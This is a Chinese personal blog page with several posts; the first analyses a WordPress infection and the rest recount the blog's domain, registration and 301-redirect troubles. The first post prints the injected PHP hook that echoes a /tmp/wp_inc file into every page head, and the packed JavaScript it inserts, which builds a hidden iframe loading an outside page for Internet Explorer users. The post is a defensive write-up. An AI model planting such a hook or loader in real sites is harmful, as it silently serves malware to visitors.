Categories
Wordpress

wordpress之手动查木马侵入

最近两个blog都不消停,总有木马嵌入的报告。是可忍孰不可忍,在今早收到google Webmaster的通知之后,决定彻底的查一下这个感染的原因。

登上FTP,看到wp-settings.php这个文件更新日期和其他的都不一样,就下下他来。然后和标准的安装包自带的wp-settings.php进行比对,果然发现多了这么几行:
function check_wordpress(){
$t_d = sys_get_temp_dir();
if(file_exists($t_d . '/wp_inc')){
readfile($t_d . '/wp_inc');
}
}
add_action('wp_head', 'check_wordpress');

遂加了一行echo $t_d. '/wp_inc' ;,华丽丽的发现输出了一个/tmp。这个时候访问blog并查看源文件,发现有一行代码被嵌入:
35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('i 9(){a=6.h('b');7(!a){5 0=6.j('k');6.g.l(0);0.n='b';0.4.d='8';0.4.c='8';0.4.e='f';0.m='w://z.o.B/C.D?t=E'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height|width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie|toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|hggf|navigator|ai|showthread|php|72241732'.split('|'),0,{})) // ]]>
这就是一切祸首的来源!

总结一下,这个木马的入侵模式为:修改wp-settings.php文件,然后调用系统临时文件夹/tmp下的wp_inc文件,然后嵌入到网站的里面,实现JS入侵

最简单的屏蔽办法自然是覆盖wp-settings.php文件,然后这行代码的嵌入果然消失了,网站也就没问题了。然而最大的问题则是,服务器已经被感染了,他会不断的重写wp-settings.php文件,而且就算我把文件的权限设为600(只读)而不是644也无济于事。这下子,我也不知道应该怎么办了……看了一下google的report,貌似整个服务器上有很多网站都中招了,汗。

Of the 168165 site(s) we tested on this network over the past 90 days, 4491 site(s) served content that resulted in malicious software being downloaded and installed without user consent.

莫非要换服务器了?……又是一年搬家时?
p.s. 发现自己向着下列目标在不懈努力:

上得了厅堂,下得了厨房,写得了代码,查得出异常,杀得了木马,翻得了围墙,开得起好车,买得起新房,斗得过二奶,打得过流氓.

Categories
网站建设

301,永久重定向!

我这次彻底被惹火了。真的大感慨:早知如此,何必当初!

落园两个域名、两个服务器分别独立运行的痛苦日子终于要结束了——我也痛下决心,牺牲一部分速度,做出这个抉择——落园国内服务器暂停。接下来的问题就是把.cn的域名做一个301永久重定向,全部指到loyhome.com来。

其实本来是想做一个在MySQL 层面的数据库同步的,但无奈两个服务器之间不给力,同步很难做。wordpress镜像的次选择就是直接在配置文件里面写入远程MySQL服务器地址,但也不是很给力。最后的办法就是全静态同步,自然还是不给力。我实在忍无可忍了,再也不想忍受两个站点手动同步刷新的痛苦,于是决定赶紧的搞定这个事儿。.com转到国内还牵扯一个备案问题,同样是折磨的我实在是受不了的事儿。索性,一了百了,全面转身.com并使用国外的服务器。为了清理这一年来的旧账(两边都有留言),我还写了一天的R代码来一一对应各种文章ID和留言ID,最后终于全面整理了过来。国内的服务器可能还会保留给后花园用。

我不得不唠叨一下这些痛苦的历史。落园从2006年开始运行在独立域名上(落园以前是在blogcn上的,前段时间blogcn删档,落园最早的文章就全部覆灭了,正好,毁尸灭迹,不怕有人追踪什么了),以loyhome.cn作为唯一的域名。后来波折一再,.cn域名从来就没有消停过。先是备案,由于换空间商换了一次,所以前后备案痛苦的备了两次;后是实名认证,直接导致去年不在国内的我无奈的看着域名被封了两个月,这也是当时一怒之下注册loyhome.com取而代之的缘故。这还是域名和空间的事儿。落园所依赖的程序上,本来采用的是Textcube,后来实在是不给力就转到wordpress了。当年那次大搬家费了我好大事儿,不得不手动对应两个MySQL数据库,写了一堆PHP程序来实现了完全的迁移。至于各种小波折小调整就不罗列了……

回顾这差不多7年的落园成长史,就是一部充斥着各种折磨的辛酸血泪史。不堪忍受删文章,就自己掏钱买域名买空间做独立博客;不堪忍受TC的低效,就自己写PHP代码鼓捣MySQL彻底转到Wordpress来;不堪忍受一而再、再而三的实名认证,就忍痛把旧域名转到新域名来。谁说写博客容易的?我真不想骂人,可是哪有强迫人不仅要有文笔、还要有独立思考能力、还要有时间有持之以恒精神、还要不计金钱报酬(落园从未也永远不会挂任何广告)、还要学会写PHP代码查bug弄SEO、还要搞的定国外的域名注册……说真的,落园能走到现在,我已经很满足了,很满足了。有的时候真的想过放弃算了,一个博客而已。但是还是跌跌撞撞的坚持下来了。现在所有人都在微博上玩的不亦乐乎,还有多少人关注博客?在大多数博客沦落为相互复制粘贴、挂满小广告或者半年不更新的今日,还有多少人关注什么原创和持之以恒?

总而言之,当我在阿里巴巴商学院门口看到马云题写的四个有点难看的字“永不放弃”的时候,当时想到落园就有种泪流满面的冲动。如果没有这么多朋友的支持与鼓励、没有一篇篇日志后面那些温馨的让人忘记寒冬的留言,我可能真的坚持不到今天。还有,当我不止一次在网上搜问题搜回到自己的博客的时候,只有会心一笑,稍稍讽刺,却也暗自欢喜。

我很对不起很多国内的、尤其是限制国外流量的教育网的朋友们。我知道这一次301之后,很多人访问落园的速度会慢下来,还有可能打不开。但是,我已经没有其他更好的办法了。如果IPV6可以用的话,还请用Google reader订阅落园的RSS吧!如果你们连留言页面都打不开,那么就给我发邮件吧!我不想失去大家的关怀,也请大家不要忘记落园这么一个越来越孤独的存在。

丢车,是为了保帅。只有暗自的期望落园的未来可以顺畅的走下去,毕竟一个博客的核心是内容——正如301对应的解释,永久重定向,我也不想浪费更多的时间在其他的网站管理等琐事上了。涅磐之后,还请雨过天晴。

Categories
网站建设

落园旧域名找回来了~

呃,折腾了一个月,终于找回来了loyhome.cn的域名。唉,个中艰辛就不说了,其间还无奈申请了loyhome.com的域名……

好在终于回来了,能访问了,能顺利解析了。这里需要各位稍稍辛苦的是,如果您是使用loyhome.cn/feed订阅的落园RSS,请将订阅地址改为http://feed.loyhome.com。另,loyhome.cn会继续在它能存活的期限内存活,如果您那天看不到它了,不妨试试loyhome.com。虽然国内的服务器访问速度会快一点,但是天有不测风云……

嗯,暂时就想到这些。目前的打算是两边会同步更新,就跟镜像似的……至于其他的,我还没想好,逐渐的过渡吧~

Categories
网站建设

周折

向所有人道歉,落园的最近的不稳定不是我所能预料到的,我实在想不到一个小小的cn域名还会被停止解析。虽然只是实名认证这种小事儿,但是赶上中秋国庆,我实在没辙,就这样落园小小的瘫痪了半个月。期间我郁闷不已,只能去英文博客上灌灌水……

虽然loyhome.cn的域名还是有挽回的希望的,但是我实在是受不了如此的折腾,便又注册了一个loyhome.com的域名。是的,很简单,.cn变成了.com,但是因此流失的各种东西,我已经不想细细再数。

暂时把落园放在国外的服务器上了,因为当我试图把.com域名指到原来国内的空间之时,悲惨的被告知还是要先备案的。再备案俩月?算了,我宁愿放在国外的服务器上。我知道可能因此很多人打不开网站、很多人访问速度很慢,但是我能做的只有:1. 尽快挽回loyhome.cn域名,争取恢复国内服务器的访问(到时候两边会同步更新,也就是作镜像)2.逐步的迁移各种文件之类,(比如友链全消失了,唉。)现在因为无法DNS解析,我连301永久重定向都做不了,唉。

好在RSS是托管在feedsky上面的,所以它还苟延残喘着。现在我已经把feedsky的地址指过来了,诸位如果使用feedsky地址订阅落园的应该可以直接看到新文章。但是不幸的是,从google reader的记录看,还有是百余人在使用loyhome.cn/feed来直接订阅的,我只能无奈的说等loyhome.cn域名恢复解析吧。

嗯,暂时就想到这些。麻烦诸位有空帮忙转一下新网址:www.loyhome.com,还有辛苦大家改一下友情链接的地址。然后多谢最近一段时间大家对我、还有落园的关注。每一次很无奈的回答你们“我的域名被停了”,都是一把辛酸泪外加无数感动。还得特别谢谢yihui,排除万难帮我把新域名安顿下来……

但是始终,我想不明白,我一不牟利、二不涉及政治,何苦这般为难我?我不会放弃中文博客,但是请不要太为难我。